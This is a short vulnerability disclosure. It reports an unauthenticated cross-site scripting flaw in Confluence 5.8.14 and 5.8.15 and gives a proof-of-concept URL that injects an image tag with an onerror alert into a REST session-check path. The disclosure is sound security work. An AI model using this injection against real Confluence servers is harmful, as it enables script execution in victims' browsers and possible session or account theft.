An unauthenticated XSS vulnerability has been confirmed in confluence 5.8.15 and 5.8.14.
The vulnerability is located at /rest/prototype/1/session/check/something
POC URL:
http://<server>/conf_path/rest/prototype/1/session/check/something%3Cimg%20src%3da%20onerror%3dalert%280%29%3E
This was confirmed in the latest version of firefox.